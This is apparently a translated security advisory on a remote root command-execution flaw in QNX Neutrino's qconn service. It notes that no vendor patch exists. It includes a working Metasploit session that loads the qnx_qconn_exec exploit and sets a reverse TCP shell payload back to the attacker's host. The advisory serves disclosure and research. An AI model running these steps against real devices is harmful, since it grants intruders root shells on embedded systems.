Qnx qconn Remote Command Execution Vulnerability

Release date:
Updated on:

Affected Systems:
QNX QCONN
Description:
--------------------------------------------------------------------------------
QNX Neutrino real-time operating system is a fully functional and stable operating system. Its modules can be flexibly increased or decreased to meet the limited requirements of real-time embedded system resources.

A security vulnerability exists in the qconn component of QNX Neutrino, which allows unauthenticated users to execute arbitrary commands as root users.

<* Source: David Odell

Link: http://www.metasploit.com/modules/exploit/unix/misc/qnx_qconn_exec
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

$ Msfconsole

#########
########################################
################################
######################################
##############################
######################################
##

Msf> use exploit/unix/misc/qnx_qconn_exec
Msf exploit (qnx_qconn_exec)> show payloads
Msf exploit (qnx_qconn_exec)> set PAYLOAD generic/shell_reverse_tcp
Msf exploit (qnx_qconn_exec)> set LHOST [my ip address]
Msf exploit (qnx_qconn_exec)> set RHOST [target ip]
Msf exploit (qnx_qconn_exec)> exploit

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

QNX
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.qnx.com/